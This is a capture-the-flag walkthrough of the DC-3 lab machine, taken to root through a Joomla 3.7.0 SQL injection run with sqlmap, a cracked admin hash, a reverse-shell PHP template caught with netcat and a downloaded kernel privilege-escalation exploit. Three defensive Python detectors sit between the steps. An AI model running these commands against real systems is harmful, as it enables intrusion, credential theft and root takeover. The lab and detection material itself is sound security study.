We start off with an nmap scan of the remote host.
root@ubuntu:~/src# nmap -p- -T5 192.168.56.102
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-01 13:24 MDT
Warning: 192.168.56.102 giving up on port because retransmission cap hit (2).
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 13:27 (0:00:00 remaining)
Nmap scan report for symfonos.local (192.168.56.102)
Host is up (0.00073s latency).
Not shown: 65529 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:1C:53:6A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 185.63 seconds
root@ubuntu:~/src#
Nmap came back with only port 80 open. Our next task is to fire up Nikto and run it against the host.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2019-11-01 13:28:46 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting.
+ OSVDB-3092: /bin/: This might be interesting.
+ OSVDB-3092: /includes/: This might be interesting.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8757 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2019-11-01 13:29:50 (GMT-6) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#
Nikto came back with some interesting results. Checking some of the directories in the output, we find that this server is running the Joomla CMS. We hit the site with joomscan next and learn that the version is Joomla 3.7.0. We move on to searchsploit to see if there are any exploits for this version of Joomla.
root@ubuntu:~/src/exploitdb# ./searchsploit joomla 3.7.0
--------------------------------------------- -------------------------------------------
 Exploit Title                               |  Path
                                             | (/home/sam/src/exploitdb/)
--------------------------------------------- -------------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection   | exploits/php/webapps/42033.txt
--------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
There is one vulnerability listed for this version of Joomla. Reading the exploit file, we find the following:
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
It gives us instructions for running sqlmap against the host, so we use the example from the exploit file.
./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
[13:52:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[13:52:22] [INFO] fetching database names
[13:52:23] [INFO] used SQL query returns 5 entries
[13:52:23] [INFO] retrieved: 'information_schema'
[13:52:23] [INFO] retrieved: 'joomladb'
[13:52:23] [INFO] retrieved: 'mysql'
[13:52:23] [INFO] retrieved: 'performance_schema'
[13:52:23] [INFO] retrieved: 'sys'
available databases [5]:
We found 5 databases on the server; next we extract the tables of the joomladb database.
./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables joomladb
Database: joomladb
[76 tables]
+----------------------+
| #__assets            |
| #__associations      |
| #__banner_clients    |
| #__banner_tracks     |
| #__banners           |
| #__bsms_admin        |
| #__bsms_books        |
| #__bsms_comments     |
| #__bsms_locations    |
| #__bsms_mediafiles   |
| #__bsms_message_typ  |
| #__bsms_podcast      |
| #__bsms_series       |
| #__bsms_servers      |
| #__bsms_studies      |
| #__bsms_studytopics  |
| #__bsms_teachers     |
| #__bsms_templatecod  |
| #__bsms_templates    |
| #__bsms_timeset      |
| #__bsms_topics       |
| #__bsms_update       |
| #__categories        |
| #__contact_details   |
| #__content_frontpag  |
| #__content_rating    |
| #__content_types     |
| #__content           |
| #__contentitem_tag_  |
| #__core_log_searche  |
| #__extensions        |
| #__fields_categorie  |
| #__fields_groups     |
| #__fields_values     |
| #__fields            |
| #__finder_filters    |
| #__finder_links_ter  |
| #__finder_links      |
| #__finder_taxonomy_  |
| #__finder_taxonomy   |
| #__finder_terms_com  |
| #__finder_terms      |
| #__finder_tokens_ag  |
| #__finder_tokens     |
| #__finder_types      |
| #__jbsbackup_timese  |
| #__jbspodcast_times  |
| #__languages         |
| #__menu_types        |
| #__menu              |
| #__messages_cfg      |
| #__messages          |
| #__modules_menu      |
| #__modules           |
| #__newsfeeds         |
| #__overrider         |
| #__postinstall_mess  |
| #__redirect_links    |
| #__schemas           |
| #__session           |
| #__tags              |
| #__template_styles   |
| #__ucm_base          |
| #__ucm_content       |
| #__ucm_history       |
| #__update_sites_ext  |
| #__update_sites      |
| #__updates           |
| #__user_keys         |
| #__user_notes        |
| #__user_profiles     |
| #__user_usergroup_m  |
| #__usergroups        |
| #__users             |
| #__utf8_conversion   |
| #__viewlevels        |
+----------------------+
We got back 76 tables, but the one we are interested in is the '#__users' table. Next we extract its columns from the remote host.
./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns -D joomladb -T "#_users"
We get three columns from the users table: email, username and password for the admin of the site.
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
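The injection above rides entirely on the list[fullordering] parameter of com_fields, and sqlmap's --random-agent makes the User-Agent useless as a signal, so detection has to key on the parameter itself. The following is an added example (not part of the original post) that scans Apache combined-format log lines for com_fields requests whose ordering value is anything other than "<column> ASC|DESC" or contains MySQL functions such as updatexml; the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (not taken from the original post):
# a legitimate Joomla ordering request, two injection probes of the kind
# the post sends via sqlmap, and an unrelated request.
SAMPLE_LOG = r'''
192.168.56.101 - - [01/Nov/2019:13:50:01 -0600] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.56.101 - - [01/Nov/2019:13:52:22 -0600] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 1203 "-" "Mozilla/5.0"
192.168.56.101 - - [01/Nov/2019:13:52:23 -0600] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x7e,(SELECT+database())),1)) HTTP/1.1" 500 1188 "-" "Mozilla/5.0"
192.168.56.101 - - [01/Nov/2019:13:53:00 -0600] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A genuine list[fullordering] value is only ever "<column> ASC|DESC".
SAFE_ORDERING = re.compile(r'^[a-z_][a-z0-9_.]* (asc|desc)$', re.IGNORECASE)
# MySQL functions that give away an error-based injection like the updatexml one above.
SQL_FUNCS = re.compile(r'\b(updatexml|extractvalue|select|concat|sleep|benchmark)\b',
                       re.IGNORECASE)


def classify_request(target):
    """Return a reason string when a com_fields request abuses list[fullordering], else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get('option') != ['com_fields']:
        return None
    for value in params.get('list[fullordering]', []):
        if SQL_FUNCS.search(value):
            return 'SQL function in list[fullordering]'
        if not SAFE_ORDERING.match(value):
            return 'list[fullordering] is not "<column> ASC|DESC"'
    return None


def find_ordering_injection(log_text):
    """Scan combined-format log lines and return one finding per abusive request."""
    findings = []
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_request(m['target'])
        if reason:
            findings.append({'line': lineno, 'client': m['client'],
                             'status': int(m['status']), 'reason': reason})
    return findings


if __name__ == '__main__':
    for finding in find_ordering_injection(SAMPLE_LOG):
        print(finding)
```

The 500 responses on the flagged lines are the other half of the signal: error-based extraction works by making the query fail, so a burst of com_fields requests returning 500 from one client is worth an alert on its own.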
Our next task is to fire up John the Ripper and crack the hash we got from the database.
root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/joomla.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy           (admin)
1g 0:00:00:03 DONE (2019-11-01 14:16) 0.3311g/s 47.68p/s 47.68c/s 47.68C/s mylove..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#
Now we can try to log in to the admin interface of the Joomla site.
Just like in WordPress, an admin can edit the PHP files in the templates folder. We do exactly that and add our reverse-connect PHP code to the index.php file of the template.
Once the PHP file is saved, we click the 'Template Preview' button: the preview function of the Joomla CMS executes the template, our reverse shell code runs, and we get a connection back to our Kali box.
root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 39464
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 06:23:02 up  1:00,  0 users,  load average: 0.00, 0.04, 0.11
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/$
We upgrade the shell to a proper TTY with the Python pty trick and go off searching.
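An edit made through the admin template editor is just a file write under the templates directory, so a file-integrity baseline of the template PHP files catches exactly this step. The following is an added example (not part of the original post or of Joomla itself): it hashes every PHP file under a templates tree, reports files that are new or differ from a recorded baseline, and greps those for calls a template never needs (sockets, process spawning, eval). The template tree, the baseline and the appended socket call are all constructed inside demo().

```python
import hashlib
import os
import re
import tempfile

# Calls a Joomla template file never legitimately needs.
SHELL_INDICATORS = re.compile(
    r'\b(fsockopen|proc_open|shell_exec|passthru|popen|exec|system|eval)\s*\(', re.IGNORECASE)


def sha256_file(path):
    with open(path, 'rb') as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def hunt_templates(root, baseline):
    """Report PHP files under root that are absent from or differ from the
    baseline {relative_path: sha256}, plus any shell indicator found in them."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            if baseline.get(rel) == sha256_file(path):
                continue  # unchanged since the baseline was taken
            with open(path, encoding='utf-8', errors='replace') as fh:
                hit = SHELL_INDICATORS.search(fh.read())
            findings.append({'file': rel,
                             'status': 'modified' if rel in baseline else 'unknown',
                             'indicator': hit.group(0) if hit else None})
    return sorted(findings, key=lambda f: f['file'])


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w', encoding='utf-8') as fh:
        fh.write(text)


def demo():
    """Constructed templates tree: two stock templates are baselined, then one
    index.php gets a socket call appended (what the post does through the
    template editor) and an unknown PHP file appears next to it."""
    root = tempfile.mkdtemp()
    stock = "<?php defined('_JEXEC') or die; ?>\n<html><body>site</body></html>\n"
    for tpl in ('beez3', 'protostar'):
        _write(os.path.join(root, tpl, 'index.php'), stock)
    baseline = {f'{tpl}/index.php': sha256_file(os.path.join(root, tpl, 'index.php'))
                for tpl in ('beez3', 'protostar')}
    _write(os.path.join(root, 'protostar', 'index.php'),
           stock + "<?php $sock = fsockopen('ATTACKER_HOST', 4444); /* ... */ ?>\n")
    _write(os.path.join(root, 'protostar', 'cache.php'), "<?php echo 'x'; ?>\n")
    return hunt_templates(root, baseline)


if __name__ == '__main__':
    for finding in demo():
        print(finding)
```

Re-baselining after every legitimate template update keeps the report small; on a Joomla host the same check is worth running over the web root's writable directories, since a modified index.php is only one of the places the editor can write.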
www-data@DC-3:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
dc3:x:1000:1000:dc3,,,:/home/dc3:/bin/bash
www-data@DC-3:/var/www/html$
We see there is one regular user on the system, 'dc3'; other than that there is nothing interesting in the passwd file.
www-data@DC-3:/var/www/html$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/tmp/ebpf_mapfd_doubleput_exploit/suidhelper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/at
www-data@DC-3:/var/www/html$
We search for SUID binaries on the system but find nothing that could help us escalate our privileges, so we move on to the kernel version information, looking for a kernel exploit.
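From the defender's side, the find listing above is the interesting artifact: it already contains a root-owned SUID file under /tmp (the exploit helper used later in the post), and a SUID binary anywhere a low-privileged user can write is never legitimate. The following is an added example (not from the original post) that triages such a listing: anything under a user-writable tree is hostile, anything outside the distro's system trees or missing from a recorded baseline is unexpected. The path list is the post's own find output; the baseline in demo() is constructed.

```python
# SUID listing copied from the post's find output on DC-3 (page data, not constructed).
SUID_FIND_OUTPUT = """
/bin/ping6 /bin/ntfs-3g /bin/umount /bin/su /bin/fusermount /bin/mount /bin/ping
/tmp/ebpf_mapfd_doubleput_exploit/suidhelper
/usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic /usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd /usr/bin/newgidmap /usr/bin/gpasswd /usr/bin/sudo /usr/bin/pkexec
/usr/bin/chsh /usr/bin/chfn /usr/bin/newuidmap /usr/bin/newgrp /usr/bin/at
"""

# Trees a low-privileged user can write to: a SUID file there is an attacker artifact.
USER_WRITABLE = ('/tmp/', '/var/tmp/', '/dev/shm/', '/home/', '/var/www/')
# Where distro packages legitimately install SUID binaries.
SYSTEM_TREES = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/', '/usr/lib/', '/usr/libexec/')


def triage_suid(find_output, baseline=None):
    """Map each SUID path to 'hostile', 'unexpected' or 'expected'.

    baseline: optional set of SUID paths recorded from a clean install; any path
    not in it is reported as 'unexpected' even when it lives under a system tree.
    """
    verdicts = {}
    for path in find_output.split():
        if path.startswith(USER_WRITABLE):
            verdicts[path] = 'hostile'
        elif not path.startswith(SYSTEM_TREES):
            verdicts[path] = 'unexpected'
        elif baseline is not None and path not in baseline:
            verdicts[path] = 'unexpected'
        else:
            verdicts[path] = 'expected'
    return verdicts


def suspicious(find_output, baseline=None):
    """Sorted list of SUID paths that need a human look."""
    return sorted(p for p, v in triage_suid(find_output, baseline).items() if v != 'expected')


def demo():
    # Constructed baseline: the same host's SUID set before the exploit helper
    # appeared and before /usr/bin/at was (hypothetically) added.
    baseline = set(SUID_FIND_OUTPUT.split()) - {
        '/tmp/ebpf_mapfd_doubleput_exploit/suidhelper', '/usr/bin/at'}
    return suspicious(SUID_FIND_OUTPUT, baseline)


if __name__ == '__main__':
    for path, verdict in triage_suid(SUID_FIND_OUTPUT).items():
        if verdict != 'expected':
            print(verdict, path)
```

Mounting /tmp with nosuid removes the whole class: the exploit's helper can be created there but the kernel ignores its SUID bit, and a periodic diff of this listing against the baseline is what turns the helper into an alert rather than a finding after the fact.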
www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html$
www-data@DC-3:/var/www/html$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@DC-3:/var/www/html$
We see the kernel version is 4.4.0-21 running on Ubuntu 16.04 LTS. Let's fire up searchsploit and look for possible exploits for this version of Linux.
root@ubuntu:~/src/exploitdb# ./searchsploit ubuntu 16.04
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Loc | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/47169.c
------------------------------------------------------------------------------------------------------------------------------------ -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
We find one that looks interesting: the Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation exploit. We download the exploit to the remote host and try to compile it on the machine.
www-data@DC-3:/tmp$ wget http://192.168.56.1/~sam/exploit.tar
wget http://192.168.56.1/~sam/exploit.tar
--2019-11-02 06:52:42--  http://192.168.56.1/~sam/exploit.tar
Connecting to 192.168.56.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'

exploit.tar         100%[===================>]  20.00K  --.-KB/s    in 0s

2019-11-02 06:52:42 (134 MB/s) - 'exploit.tar' saved [20480/20480]

www-data@DC-3:/tmp$ ls
ls
exploit.tar  systemd-private-268ff12d81824fca955ee00cf8f2944e-systemd-timesyncd.service-6lcYCc
www-data@DC-3:/tmp$
We need to untar the files in the exploit archive before we can compile. After that, all that's left to do is compile the exploit and cross our fingers that it works.
www-data@DC-3:/tmp$ tar xvf exploit.tar
tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp$ cd ebpf_mapfd_doubleput_exploit
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26  2016 .
drwxrwxrwt 9 root     root     4096 Nov  2 06:53 ..
-rwxr-x--- 1 www-data www-data  155 Apr 26  2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26  2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26  2016 hello.c
-rw-r----- 1 www-data www-data  255 Apr 26  2016 suidhelper.c
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
   .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
   .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$
We make the compiled exploit binary executable and run it.
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x doubleput
chmod +x doubleput
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit#
We got root! If we change directory to /root we find the one and only flag.
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls -la
ls -la
total 32
drwx------  2 root root 4096 Mar 26  2019 .
drwxr-xr-x 22 root root 4096 Mar 23  2019 ..
-rw-------  1 root root   67 Mar 26  2019 .bash_history
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-------  1 root root   71 Mar 23  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
-rw-------  1 root root 2889 Mar 26  2019 .viminfo
-rw-r--r--  1 root root  604 Mar 26  2019 the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                  _ _ _ _
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
root@DC-3:/root#